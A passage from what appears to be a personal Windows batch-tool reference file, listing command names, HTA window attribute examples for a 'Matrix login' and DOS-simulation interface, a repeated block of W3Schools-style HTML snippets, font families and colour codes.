  654. [HELP] => FIND "WORD" File.txt & Any Text File WORD Search
  655. [HELP]::-=-=-=-=-=-=-=-=-=-==-=-=-=-HELP END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  656. [COMMANDS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COMMANDS-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  657. [COMMANDS] => [CD]; [CLIP]; [DIR]; [ATTRIB]; [COPY]; [WMIC]; [NET]; [MD]
  658. [COMMANDS] => [FIND]; [VIRUS]; [NIRCMD]; [RAR]; [CSS]; [HTML]; [HTA]
  659. [COMMANDS] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COMMANDS END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  660. [HTA] ::-=-=-=-=-=-=-=-=-=-==-=-=-=- HTA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  661. [HTA] EXMPLE=1
  662. [HTA] <HTA:APPLICATION
  663. [HTA] ICON="cmd.exe"
  664. [HTA] APPLICATIONNAME = "Microsoft Windows [version 7.1 7631] Copyright Simulation Dos © Najeeb © 2021"
  665. [HTA] BORDER="dialog"
  666. [HTA] BORDERSTYLE="complex"
  667. [HTA] SINGLEINSTANCE="yes"
  668. [HTA] WINDOWSTATE="maximize"
  669. [HTA] >
  670. [HTA] EXMPLE=2
  671. [HTA] <html>
  672. [HTA] <head>
  673. [HTA] <TITLE>MATRIX LOGIN © NAJEEB © 2021</TITLE>
  674. [HTA] <HTA:APPLICATION
  675. [HTA] APPLICATIONNAME="MATRIX LOGIN © NAJEEB © 2021"
  676. [HTA] VERSION="1.0.0.0"
  677. [HTA] BORDER="none" ; "Thin" ; "Dialog"
  678. [HTA] BORDERSTYLE="Complex" ; "Raised" ; "Static" ; "Sunken" ; "Normal"
  679. [HTA] INNERBORDER="no" ; "Yes"
  680. [HTA] CAPTION="no" ; "Yes"
  681. [HTA] SYSMENU="no" ; "Yes"
  682. [HTA] MAXIMIZEBUTTON="no" ; "Yes"
  683. [HTA] MINIMIZEBUTTON="no" ; "Yes"
  684. [HTA] ICON="NO" ; "cmd.exe" ; "C:\Windows\N.ico"
  685. [HTA] SCROLL="no" ; "Yes" ; "Auto"
  686. [HTA] SCROLLFLAT="yes" ; "No"
  687. [HTA] SINGLEINSTANCE="yes" ; "No"
  688. [HTA] WINDOWSTATE="maximize" ; "Normal" ; "Minimize"
  689. [HTA] SHOWINTASKBAR="no" ; "Yes"
  690. [HTA] CONTEXTMENU="no" ; "Yes"
  691. [HTA] SELECTION="no" ; "Yes"
  692. [HTA] NAVIGABLE="no" ; "Yes"
  693. [HTA] ID="oHTA"
  694. [HTA] />
  695. [HTA] ::-=-=-=-=-=-=-=-=-=-==-=-=-=- HTA END -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  696. [HTML]::-=-=-=-=-=-=-=-=-=-==-=-=-=-HTML-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  697. [HTML] <DOCTYPE html>
  698. [HTML] <html>
  699. [HTML] <-- Write your comments here -->
  700. [HTML] <head>
  701. [HTML] <canvas id="myCanvas" width="200" height="100" style="border:1px solid #000000;">
  702. [HTML] </canvas>
  703. [HTML] <title>My Page Title</title>
  704. [HTML] <link rel="icon" type="image/x-icon" href="/images/favicon.ico">
  705. [HTML] </head>
  706. [HTML] <body>
  707. [HTML] <iframe src="demo_iframe.htm" height="200" width="300" title="Iframe Example"></iframe>
  708. [HTML] <iframe src="demo_iframe.htm" name="iframe_a" title="Iframe Example"></iframe>
  709. [HTML] <p><a href="https://www.w3schools.com" target="iframe_a">W3Schools.com</a></p>
  710. [HTML] <script>
  711. [HTML] document.getElementById("demo").innerHTML = "Hello JavaScript";
  712. [HTML] </script>
  713. [HTML] <svg width="300" height="200">
  714. [HTML] <polygon points="100,10 40,198 190,78 10,78 160,198"
  715. [HTML] style="fill:lime;stroke:purple;stroke-width:5;fill-rule:evenodd;" />
  716. [HTML] </svg>
  717. [HTML] <svg width="100" height="100">
  718. [HTML] <circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" />
  719. [HTML] </svg>
  720. [HTML] <svg width="400" height="180">
  721. [HTML] <rect x="50" y="20" rx="20" ry="20" width="150" height="150"
  722. [HTML] style="fill:red;stroke:black;stroke-width:5;opacity:0.5" />
  723. [HTML] </svg>
  724. [HTML] <svg height="130" width="500">
  725. [HTML] <defs>
  726. [HTML] <linearGradient id="grad1" x1="0%" y1="0%" x2="100%" y2="0%">
  727. [HTML] <stop offset="0%" style="stop-color:rgb(255,255,0);stop-opacity:1" />
  728. [HTML] <stop offset="100%" style="stop-color:rgb(255,0,0);stop-opacity:1" />
  729. [HTML] </linearGradient>
  730. [HTML] </defs>
  731. [HTML] <ellipse cx="100" cy="70" rx="85" ry="55" fill="url(#grad1)" />
  732. [HTML] <text fill="#ffffff" font-size="45" font-family="Verdana" x="50" y="86">SVG</text>
  733. [HTML] Sorry, your browser does not support inline SVG.
  734. [HTML] </svg>
  735. [HTML] <table>
  736. [HTML] <tr>
  737. [HTML] <th>Company</th>
  738. [HTML] <th>Contact</th>
  739. [HTML] <th>Country</th>
  740. [HTML] </tr>
  741. [HTML] <tr>
  742. [HTML] <td>Alfreds Futterkiste</td>
  743. [HTML] <td>Maria Anders</td>
  744. [HTML] <td>Germany</td>
  745. [HTML] </tr>
  746. [HTML] <tr>
  747. [HTML] <td>Centro comercial Moctezuma</td>
  748. [HTML] <td>Francisco Chang</td>
  749. [HTML] <td>Mexico</td>
  750. [HTML] </tr>
  751. [HTML] </table>
  752. [HTML] <ul>
  753. [HTML] <li>Coffee</li>
  754. [HTML] <li>Tea</li>
  755. [HTML] <li>Milk</li>
  756. [HTML] </ul>
  757. [HTML] <pre>TEXT</pre>
  758. [HTML] <h1>This is a Heading</h1>H1 TO H6<br>
  759. [HTML] <p>This is a paragraph.</p>
  760. [HTML] Line Breaks<br>
  761. [HTML] <a href="https://www.w3schools.com">Visit W3Schools</a><br>
  762. [HTML] <a href="#C4">Jump to Chapter 4</a>
  763. [HTML] <img src="img_girl.jpg" width="500" height="600" alt="Flowers in Chania">
  764. [HTML] <div style="background-image: url('img_girl.jpg');">
  765. [HTML] </body>
  766. [HTML] </html>
  767. [HTML] ----------------------------------
  768. [HTML] <ul> Defines an unordered list
  769. [HTML] <ul style="list-style-type:disc;">
  770. [HTML] disc Sets the list item marker to a bullet (default)
  771. [HTML] circle Sets the list item marker to a circle
  772. [HTML] square Sets the list item marker to a square
  773. [HTML] none The list items will not be marked
  774. [HTML] <ol> Defines an ordered list
  775. [HTML] <ol type="1">
  776. [HTML] type="1" The list items will be numbered with numbers (default)
  777. [HTML] type="A" The list items will be numbered with uppercase letters
  778. [HTML] type="a" The list items will be numbered with lowercase letters
  779. [HTML] type="I" The list items will be numbered with uppercase roman numbers
  780. [HTML] type="i" The list items will be numbered with lowercase roman numbers
  781. [HTML] <li> Defines a list item
  782. [HTML] <dl> Defines a description list
  783. [HTML] <dt> Defines a term in a description list
  784. [HTML] <dd> Describes the term in a description list
  785. [HTML] HTML Formatting Elements
  786. [HTML] <b> - Bold text</b>
  787. [HTML] <strong> - Important text</strong>
  788. [HTML] <i> - Italic text</i>
  789. [HTML] <em> - Emphasized text</em>
  790. [HTML] <mark> - Marked text</mark>
  791. [HTML] <small> - Smaller text</small>
  792. [HTML] <del> - Deleted text</del>
  793. [HTML] <ins> - Inserted text</ins>
  794. [HTML] <sub> - Subscript text</sub>
  795. [HTML] <sup> - Superscript text/sup>
  796. [HTML] In this chapter we will go through the <blockquote>,<q>, <abbr>,
  797. [HTML] <address>,<cite>, and <bdo> HTML elements.
  798. [HTML] -----------------------------------------------
  799. [HTML] Here are the block-level elements in HTML: <div>Hello World</div>
  800. [HTML] <address><article><aside><blockquote><canvas><dd><div><dl><dt>
  801. [HTML] <fieldset><figcaption><figure><footer><form><h1>-<h6><header><hr>
  802. [HTML] <li><main><nav><noscript><ol><p><pre><section><table><tfoot><ul><video>
  803. [HTML] ----------------------------------------------------
  804. [HTML] Here are the inline elements in HTML: <span>Hello World</span>
  805. [HTML] <a><abbr><acronym><b><bdo><big><br><button><cite><code><dfn><em><i>
  806. [HTML] <img><input><kbd><label><map><object><output><q><samp><script><select>
  807. [HTML] <small><span><strong><sub><sup><textarea><time><tt><var>
  808. [HTML] ----------------------------------------------------------
  809. [HTML] Define the character set used:
  810. [HTML] <meta charset="UTF-8">
  811. [HTML] Define keywords for search engines:
  812. [HTML] <meta name="keywords" content="HTML, CSS, JavaScript">
  813. [HTML] Define a description of your web page:
  814. [HTML] <meta name="description" content="Free Web tutorials">
  815. [HTML] Define the author of a page:
  816. [HTML] <meta name="author" content="John Doe">
  817. [HTML] Refresh document every 30 seconds:
  818. [HTML] <meta http-equiv="refresh" content="30">
  819. [HTML] Setting the viewport to make your website look good on all devices:
  820. [HTML] <meta name="viewport" content="width=device-width, initial-scale=1.0">
  821. [HTML] -----------------------------------------------------------------
  822. [HTML] <form action="/action_page.php">
  823. [HTML] <label for="fname">First name:</label><br>
  824. [HTML] <input type="text" id="fname" name="fname" value="John"><br>
  825. [HTML] <label for="lname">Last name:</label><br>
  826. [HTML] <input type="text" id="lname" name="lname" value="Doe"><br><br>
  827. [HTML] <input type="submit" value="Submit">
  828. [HTML] </form>
  829. [HTML] ----------------------------------------------
  830. [HTML] <form>
  831. [HTML] <input type="checkbox" id="vehicle1" name="vehicle1" value="Bike">
  832. [HTML] <label for="vehicle1"> I have a bike</label><br>
  833. [HTML] <input type="checkbox" id="vehicle2" name="vehicle2" value="Car">
  834. [HTML] <label for="vehicle2"> I have a car</label><br>
  835. [HTML] <input type="checkbox" id="vehicle3" name="vehicle3" value="Boat">
  836. [HTML] <label for="vehicle3"> I have a boat</label>
  837. [HTML] </form>
  838. [HTML] -------------------
  839. [HTML] <p>Choose your favorite Web language:</p>
  840. [HTML] <form>
  841. [HTML] <input type="radio" id="html" name="fav_language" value="HTML">
  842. [HTML] <label for="html">HTML</label><br>
  843. [HTML] <input type="radio" id="css" name="fav_language" value="CSS">
  844. [HTML] <label for="css">CSS</label><br>
  845. [HTML] <input type="radio" id="javascript" name="fav_language" value="JavaScript">
  846. [HTML] <label for="javascript">JavaScript</label>
  847. [HTML] </form>
  848. [HTML] ---------------------
  849. [HTML] <form action="/action_page.php" novalidate>
  850. [HTML] <label for="email">Enter your email:</label>
  851. [HTML] <input type="email" id="email" name="email"><br><br>
  852. [HTML] <input type="submit" value="Submit">
  853. [HTML] </form>
  854. [HTML] -----------------------------------------------------
  855. [HTML] Here are the different input types you can use in HTML:
  856. [HTML] <input type="button">
  857. [HTML] <input type="checkbox">
  858. [HTML] <input type="color">
  859. [HTML] <input type="date">
  860. [HTML] <input type="datetime-local">
  861. [HTML] <input type="email">
  862. [HTML] <input type="file">
  863. [HTML] <input type="hidden">
  864. [HTML] <input type="image">
  865. [HTML] <input type="month">
  866. [HTML] <input type="number">
  867. [HTML] <input type="password">
  868. [HTML] <input type="radio">
  869. [HTML] <input type="range">
  870. [HTML] <input type="reset">
  871. [HTML] <input type="search">
  872. [HTML] <input type="submit">
  873. [HTML] <input type="tel">
  874. [HTML] <input type="text">
  875. [HTML] <input type="time">
  876. [HTML] <input type="url">
  877. [HTML] <input type="week">
  878. [HTML] --------------------------------------------------------
  879. [HTML] <video width="320" height="240" autoplay muted>
  880. [HTML] <source src="movie.mp4" type="video/mp4">
  881. [HTML] <source src="movie.ogg" type="video/ogg">
  882. [HTML] Your browser does not support the video tag.
  883. [HTML] </video>
  884. [HTML] <video width="320" height="240" autoplay>
  885. [HTML] <source src="movie.mp4" type="video/mp4">
  886. [HTML] <source src="movie.ogg" type="video/ogg">
  887. [HTML] Your browser does not support the video tag.
  888. [HTML] </video>
  889. [HTML] ------------------------------------------------
  890. [HTML] <audio controls autoplay>
  891. [HTML] <source src="horse.ogg" type="audio/ogg">
  892. [HTML] <source src="horse.mp3" type="audio/mpeg">
  893. [HTML] Your browser does not support the audio element.
  894. [HTML] </audio>
  895. [HTML] --------------------------------
  896. [HTML] <audio controls autoplay muted>
  897. [HTML] <source src="horse.ogg" type="audio/ogg">
  898. [HTML] <source src="horse.mp3" type="audio/mpeg">
  899. [HTML] Your browser does not support the audio element.
  900. [HTML] </audio>
  901. [HTML] -------------------------------------
  902. [HTML] <iframe width="420" height="315"
  903. [HTML] src="https://www.youtube.com/embed/tgbNymZ7vqY?autoplay=1&mute=1">
  904. [HTML] </iframe>
  905. [HTML] -----------------------
  906. [HTML] <iframe width="420" height="315"
  907. [HTML] src="https://www.youtube.com/embed/tgbNymZ7vqY?playlist=tgbNymZ7vqY&loop=1">
  908. [HTML] </iframe>
  909. [HTML] --------------------------------------------
  910. [HTML] <DOCTYPE HTML>
  911. [HTML] <html>
  912. [HTML] <head>
  913. [HTML] <script>
  914. [HTML] function allowDrop(ev) {
  915. [HTML] ev.preventDefault();
  916. [HTML] }
  917. [HTML] function drag(ev) {
  918. [HTML] ev.dataTransfer.setData("text", ev.target.id);
  919. [HTML] }
  920. [HTML] function drop(ev) {
  921. [HTML] ev.preventDefault();
  922. [HTML] var data = ev.dataTransfer.getData("text");
  923. [HTML] ev.target.appendChild(document.getElementById(data));
  924. [HTML] }
  925. [HTML] </script>
  926. [HTML] </head>
  927. [HTML] <body>
  928. [HTML] <div id="div1" ondrop="drop(event)" ondragover="allowDrop(event)"></div>
  929. [HTML] <img id="drag1" src="img_logo.gif" draggable="true" ondragstart="drag(event)" width="336" height="69">
  930. [HTML] </body>
  931. [HTML] </html>
  932. [HTML] --------------------------------------------
  933. [HTML] // Store
  934. [HTML] localStorage.setItem("lastname", "Smith");
  935. [HTML] // Retrieve
  936. [HTML] document.getElementById("result").innerHTML = localStorage.getItem("lastname");
  937. [HTML] --------------------------------------------
  938. [HTML] if (localStorage.clickcount) {
  939. [HTML] localStorage.clickcount = Number(localStorage.clickcount) + 1;
  940. [HTML] } else {
  941. [HTML] localStorage.clickcount = 1;
  942. [HTML] }
  943. [HTML] document.getElementById("result").innerHTML = "You have clicked the button " +
  944. [HTML] localStorage.clickcount + " time(s).";
  945. [HTML] --------------------------------------------
  946. [HTML] if (sessionStorage.clickcount) {
  947. [HTML] sessionStorage.clickcount = Number(sessionStorage.clickcount) + 1;
  948. [HTML] } else {
  949. [HTML] sessionStorage.clickcount = 1;
  950. [HTML] }
  951. [HTML] document.getElementById("result").innerHTML = "You have clicked the button " +
  952. [HTML] sessionStorage.clickcount + " time(s) in this session.";
  953. [HTML] --------------------------------------------
  954. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-HTML-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  955. [HTML] <DOCTYPE html>
  956. [HTML] <html>
  957. [HTML] <-- Write your comments here -->
  958. [HTML] <head>
  959. [HTML] <canvas id="myCanvas" width="200" height="100" style="border:1px solid #000000;">
  960. [HTML] </canvas>
  961. [HTML] <title>My Page Title</title>
  962. [HTML] <link rel="icon" type="image/x-icon" href="/images/favicon.ico">
  963. [HTML] </head>
  964. [HTML] <body>
  965. [HTML] <iframe src="demo_iframe.htm" height="200" width="300" title="Iframe Example"></iframe>
  966. [HTML] <iframe src="demo_iframe.htm" name="iframe_a" title="Iframe Example"></iframe>
  967. [HTML] <p><a href="https://www.w3schools.com" target="iframe_a">W3Schools.com</a></p>
  968. [HTML] <script>
  969. [HTML] document.getElementById("demo").innerHTML = "Hello JavaScript";
  970. [HTML] </script>
  971. [HTML] <svg width="300" height="200">
  972. [HTML] <polygon points="100,10 40,198 190,78 10,78 160,198"
  973. [HTML] style="fill:lime;stroke:purple;stroke-width:5;fill-rule:evenodd;" />
  974. [HTML] </svg>
  975. [HTML] <svg width="100" height="100">
  976. [HTML] <circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" />
  977. [HTML] </svg>
  978. [HTML] <svg width="400" height="180">
  979. [HTML] <rect x="50" y="20" rx="20" ry="20" width="150" height="150"
  980. [HTML] style="fill:red;stroke:black;stroke-width:5;opacity:0.5" />
  981. [HTML] </svg>
  982. [HTML] <svg height="130" width="500">
  983. [HTML] <defs>
  984. [HTML] <linearGradient id="grad1" x1="0%" y1="0%" x2="100%" y2="0%">
  985. [HTML] <stop offset="0%" style="stop-color:rgb(255,255,0);stop-opacity:1" />
  986. [HTML] <stop offset="100%" style="stop-color:rgb(255,0,0);stop-opacity:1" />
  987. [HTML] </linearGradient>
  988. [HTML] </defs>
  989. [HTML] <ellipse cx="100" cy="70" rx="85" ry="55" fill="url(#grad1)" />
  990. [HTML] <text fill="#ffffff" font-size="45" font-family="Verdana" x="50" y="86">SVG</text>
  991. [HTML] Sorry, your browser does not support inline SVG.
  992. [HTML] </svg>
  993. [HTML] <table>
  994. [HTML] <tr>
  995. [HTML] <th>Company</th>
  996. [HTML] <th>Contact</th>
  997. [HTML] <th>Country</th>
  998. [HTML] </tr>
  999. [HTML] <tr>
  1000. [HTML] <td>Alfreds Futterkiste</td>
  1001. [HTML] <td>Maria Anders</td>
  1002. [HTML] <td>Germany</td>
  1003. [HTML] </tr>
  1004. [HTML] <tr>
  1005. [HTML] <td>Centro comercial Moctezuma</td>
  1006. [HTML] <td>Francisco Chang</td>
  1007. [HTML] <td>Mexico</td>
  1008. [HTML] </tr>
  1009. [HTML] </table>
  1010. [HTML] <ul>
  1011. [HTML] <li>Coffee</li>
  1012. [HTML] <li>Tea</li>
  1013. [HTML] <li>Milk</li>
  1014. [HTML] </ul>
  1015. [HTML] <pre>TEXT</pre>
  1016. [HTML] <h1>This is a Heading</h1>H1 TO H6<br>
  1017. [HTML] <p>This is a paragraph.</p>
  1018. [HTML] Line Breaks<br>
  1019. [HTML] <a href="https://www.w3schools.com">Visit W3Schools</a><br>
  1020. [HTML] <a href="#C4">Jump to Chapter 4</a>
  1021. [HTML] <img src="img_girl.jpg" width="500" height="600" alt="Flowers in Chania">
  1022. [HTML] <div style="background-image: url('img_girl.jpg');">
  1023. [HTML] </body>
  1024. [HTML] </html>
  1025. [HTML] ----------------------------------
  1026. [HTML] <ul> Defines an unordered list
  1027. [HTML] <ul style="list-style-type:disc;">
  1028. [HTML] disc Sets the list item marker to a bullet (default)
  1029. [HTML] circle Sets the list item marker to a circle
  1030. [HTML] square Sets the list item marker to a square
  1031. [HTML] none The list items will not be marked
  1032. [HTML] <ol> Defines an ordered list
  1033. [HTML] <ol type="1">
  1034. [HTML] type="1" The list items will be numbered with numbers (default)
  1035. [HTML] type="A" The list items will be numbered with uppercase letters
  1036. [HTML] type="a" The list items will be numbered with lowercase letters
  1037. [HTML] type="I" The list items will be numbered with uppercase roman numbers
  1038. [HTML] type="i" The list items will be numbered with lowercase roman numbers
  1039. [HTML] <li> Defines a list item
  1040. [HTML] <dl> Defines a description list
  1041. [HTML] <dt> Defines a term in a description list
  1042. [HTML] <dd> Describes the term in a description list
  1043. [HTML] HTML Formatting Elements
  1044. [HTML] <b> - Bold text</b>
  1045. [HTML] <strong> - Important text</strong>
  1046. [HTML] <i> - Italic text</i>
  1047. [HTML] <em> - Emphasized text</em>
  1048. [HTML] <mark> - Marked text</mark>
  1049. [HTML] <small> - Smaller text</small>
  1050. [HTML] <del> - Deleted text</del>
  1051. [HTML] <ins> - Inserted text</ins>
  1052. [HTML] <sub> - Subscript text</sub>
  1053. [HTML] <sup> - Superscript text/sup>
  1054. [HTML] In this chapter we will go through the <blockquote>,<q>, <abbr>,
  1055. [HTML] <address>,<cite>, and <bdo> HTML elements.
  1056. [HTML] -----------------------------------------------
  1057. [HTML] Here are the block-level elements in HTML: <div>Hello World</div>
  1058. [HTML] <address><article><aside><blockquote><canvas><dd><div><dl><dt>
  1059. [HTML] <fieldset><figcaption><figure><footer><form><h1>-<h6><header><hr>
  1060. [HTML] <li><main><nav><noscript><ol><p><pre><section><table><tfoot><ul><video>
  1061. [HTML] ----------------------------------------------------
  1062. [HTML] Here are the inline elements in HTML: <span>Hello World</span>
  1063. [HTML] <a><abbr><acronym><b><bdo><big><br><button><cite><code><dfn><em><i>
  1064. [HTML] <img><input><kbd><label><map><object><output><q><samp><script><select>
  1065. [HTML] <small><span><strong><sub><sup><textarea><time><tt><var>
  1066. [HTML] ----------------------------------------------------------
  1067. [HTML] Define the character set used:
  1068. [HTML] <meta charset="UTF-8">
  1069. [HTML] Define keywords for search engines:
  1070. [HTML] <meta name="keywords" content="HTML, CSS, JavaScript">
  1071. [HTML] Define a description of your web page:
  1072. [HTML] <meta name="description" content="Free Web tutorials">
  1073. [HTML] Define the author of a page:
  1074. [HTML] <meta name="author" content="John Doe">
  1075. [HTML] Refresh document every 30 seconds:
  1076. [HTML] <meta http-equiv="refresh" content="30">
  1077. [HTML] Setting the viewport to make your website look good on all devices:
  1078. [HTML] <meta name="viewport" content="width=device-width, initial-scale=1.0">
  1079. [HTML] -----------------------------------------------------------------
  1080. [HTML] <form action="/action_page.php">
  1081. [HTML] <label for="fname">First name:</label><br>
  1082. [HTML] <input type="text" id="fname" name="fname" value="John"><br>
  1083. [HTML] <label for="lname">Last name:</label><br>
  1084. [HTML] <input type="text" id="lname" name="lname" value="Doe"><br><br>
  1085. [HTML] <input type="submit" value="Submit">
  1086. [HTML] </form>
  1087. [HTML] ----------------------------------------------
  1088. [HTML] <form>
  1089. [HTML] <input type="checkbox" id="vehicle1" name="vehicle1" value="Bike">
  1090. [HTML] <label for="vehicle1"> I have a bike</label><br>
  1091. [HTML] <input type="checkbox" id="vehicle2" name="vehicle2" value="Car">
  1092. [HTML] <label for="vehicle2"> I have a car</label><br>
  1093. [HTML] <input type="checkbox" id="vehicle3" name="vehicle3" value="Boat">
  1094. [HTML] <label for="vehicle3"> I have a boat</label>
  1095. [HTML] </form>
  1096. [HTML] -------------------
  1097. [HTML] <p>Choose your favorite Web language:</p>
  1098. [HTML] <form>
  1099. [HTML] <input type="radio" id="html" name="fav_language" value="HTML">
  1100. [HTML] <label for="html">HTML</label><br>
  1101. [HTML] <input type="radio" id="css" name="fav_language" value="CSS">
  1102. [HTML] <label for="css">CSS</label><br>
  1103. [HTML] <input type="radio" id="javascript" name="fav_language" value="JavaScript">
  1104. [HTML] <label for="javascript">JavaScript</label>
  1105. [HTML] </form>
  1106. [HTML] ---------------------
  1107. [HTML] <form action="/action_page.php" novalidate>
  1108. [HTML] <label for="email">Enter your email:</label>
  1109. [HTML] <input type="email" id="email" name="email"><br><br>
  1110. [HTML] <input type="submit" value="Submit">
  1111. [HTML] </form>
  1112. [HTML] -----------------------------------------------------
  1113. [HTML] Here are the different input types you can use in HTML:
  1114. [HTML] <input type="button">
  1115. [HTML] <input type="checkbox">
  1116. [HTML] <input type="color">
  1117. [HTML] <input type="date">
  1118. [HTML] <input type="datetime-local">
  1119. [HTML] <input type="email">
  1120. [HTML] <input type="file">
  1121. [HTML] <input type="hidden">
  1122. [HTML] <input type="image">
  1123. [HTML] <input type="month">
  1124. [HTML] <input type="number">
  1125. [HTML] <input type="password">
  1126. [HTML] <input type="radio">
  1127. [HTML] <input type="range">
  1128. [HTML] <input type="reset">
  1129. [HTML] <input type="search">
  1130. [HTML] <input type="submit">
  1131. [HTML] <input type="tel">
  1132. [HTML] <input type="text">
  1133. [HTML] <input type="time">
  1134. [HTML] <input type="url">
  1135. [HTML] <input type="week">
  1136. [HTML] --------------------------------------------------------
  1137. [HTML] <video width="320" height="240" autoplay muted>
  1138. [HTML] <source src="movie.mp4" type="video/mp4">
  1139. [HTML] <source src="movie.ogg" type="video/ogg">
  1140. [HTML] Your browser does not support the video tag.
  1141. [HTML] </video>
  1142. [HTML] <video width="320" height="240" autoplay>
  1143. [HTML] <source src="movie.mp4" type="video/mp4">
  1144. [HTML] <source src="movie.ogg" type="video/ogg">
  1145. [HTML] Your browser does not support the video tag.
  1146. [HTML] </video>
  1147. [HTML] ------------------------------------------------
  1148. [HTML] <audio controls autoplay>
  1149. [HTML] <source src="horse.ogg" type="audio/ogg">
  1150. [HTML] <source src="horse.mp3" type="audio/mpeg">
  1151. [HTML] Your browser does not support the audio element.
  1152. [HTML] </audio>
  1153. [HTML] --------------------------------
  1154. [HTML] <audio controls autoplay muted>
  1155. [HTML] <source src="horse.ogg" type="audio/ogg">
  1156. [HTML] <source src="horse.mp3" type="audio/mpeg">
  1157. [HTML] Your browser does not support the audio element.
  1158. [HTML] </audio>
  1159. [HTML] -------------------------------------
  1160. [HTML] <iframe width="420" height="315"
  1161. [HTML] src="https://www.youtube.com/embed/tgbNymZ7vqY?autoplay=1&mute=1">
  1162. [HTML] </iframe>
  1163. [HTML] -----------------------
  1164. [HTML] <iframe width="420" height="315"
  1165. [HTML] src="https://www.youtube.com/embed/tgbNymZ7vqY?playlist=tgbNymZ7vqY&loop=1">
  1166. [HTML] </iframe>
  1167. [HTML] --------------------------------------------
  1168. [HTML] <DOCTYPE HTML>
  1169. [HTML] <html>
  1170. [HTML] <head>
  1171. [HTML] <script>
  1172. [HTML] function allowDrop(ev) {
  1173. [HTML] ev.preventDefault();
  1174. [HTML] }
  1175. [HTML] function drag(ev) {
  1176. [HTML] ev.dataTransfer.setData("text", ev.target.id);
  1177. [HTML] }
  1178. [HTML] function drop(ev) {
  1179. [HTML] ev.preventDefault();
  1180. [HTML] var data = ev.dataTransfer.getData("text");
  1181. [HTML] ev.target.appendChild(document.getElementById(data));
  1182. [HTML] }
  1183. [HTML] </script>
  1184. [HTML] </head>
  1185. [HTML] <body>
  1186. [HTML] <div id="div1" ondrop="drop(event)" ondragover="allowDrop(event)"></div>
  1187. [HTML] <img id="drag1" src="img_logo.gif" draggable="true" ondragstart="drag(event)" width="336" height="69">
  1188. [HTML] </body>
  1189. [HTML] </html>
  1190. [HTML] --------------------------------------------
  1191. [HTML] // Store
  1192. [HTML] localStorage.setItem("lastname", "Smith");
  1193. [HTML] // Retrieve
  1194. [HTML] document.getElementById("result").innerHTML = localStorage.getItem("lastname");
  1195. [HTML] --------------------------------------------
  1196. [HTML] if (localStorage.clickcount) {
  1197. [HTML] localStorage.clickcount = Number(localStorage.clickcount) + 1;
  1198. [HTML] } else {
  1199. [HTML] localStorage.clickcount = 1;
  1200. [HTML] }
  1201. [HTML] document.getElementById("result").innerHTML = "You have clicked the button " +
  1202. [HTML] localStorage.clickcount + " time(s).";
  1203. [HTML] --------------------------------------------
  1204. [HTML] if (sessionStorage.clickcount) {
  1205. [HTML] sessionStorage.clickcount = Number(sessionStorage.clickcount) + 1;
  1206. [HTML] } else {
  1207. [HTML] sessionStorage.clickcount = 1;
  1208. [HTML] }
  1209. [HTML] document.getElementById("result").innerHTML = "You have clicked the button " +
  1210. [HTML] sessionStorage.clickcount + " time(s) in this session.";
  1211. [HTML] --------------------------------------------
  1212. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-HTML END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1213. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-FONT-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1214. [HTML] font-family: "Times New Roman", Times, serif;
  1215. [HTML] font-family: Arial, Helvetica, sans-serif;
  1216. [HTML] font-family: "Lucida Console", "Courier New", monospace;
  1217. [HTML] font-family: verdana;Serif;Sans-serif;Monospace;Cursive;Fantasy
  1218. [HTML] Times New Roman;Georgia;Garamond;Arial;Verdana;Helvetica;Courier New
  1219. [HTML] Lucida Console;Monaco;Brush Script MT;Lucida Handwriting;Copperplate
  1220. [HTML] Papyrus
  1221. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-FONT END-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1222. [HTML] ::-=-=-=-=-=-=-=-=-=-==-=-=-=-COLOR CODE-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1223. [HTML] AliceBlue(#F0F8FF);AntiqueWhite(#FAEBD7);Aqua(#00FFFF);Aquamarine(#7FFFD4);
  1224. [HTML] Azure(#F0FFFF);Beige(#F5F5DC);Bisque(#FFE4C4);Black(#000000);BlanchedAlmond(#FFEBCD);
  1225. [HTML] Blue(#0000FF);BlueViolet(#8A2BE2);Brown(#A52A2A);Brown(#A52A2A);BurlyWood(#DEB887);
  1226. [HTML] CadetBlue(#5F9EA0);Chartreuse(#7FFF00);Chocolate(#D2691E);Coral(#FF7F50);
  1227. [HTML] CornflowerBlue(#6495ED);Cornsilk(#FFF8DC);Crimson(#DC143C);Cyan(#00FFFF);
  1228. [HTML] DarkBlue(#00008B);DarkCyan(#008B8B);DarkGoldenRod(#B8860B);DarkGray(#A9A9A9);
  1229. [HTML] DarkGreen(#006400);DarkKhaki(#BDB76B);DarkMagenta(#8B008B);DarkOliveGreen(#556B2F);
  1230. [HTML] DarkOrange(#FF8C00);DarkOrchid(#9932CC);DarkRed(#8B0000);DarkSalmon(#E9967A);
  1231. [HTML] DarkSeaGreen(#8FBC8F);DarkSlateBlue(#483D8B);DarkSlateGray(#2F4F4F);DarkSlateGrey(#2F4F4F);
  1232. [HTML] DarkTurquoise(#00CED1);DarkViolet(#9400D3);DeepPink(#FF1493);DeepSkyBlue(#00BFFF);
  1233. [HTML] DimGray(#696969);DodgerBlue(#1E90FF);FireBrick(#B22222);FloralWhite(#FFFAF0);
  1234. [HTML] ForestGreen(#228B22);Fuchsia(#FF00FF);Gainsboro(#DCDCDC);GhostWhite(#F8F8FF);
  1235. [HTML] Gold(#FFD700);GoldenRod(#DAA520);Gray(#808080);Green(#008000);GreenYellow(#ADFF2F);
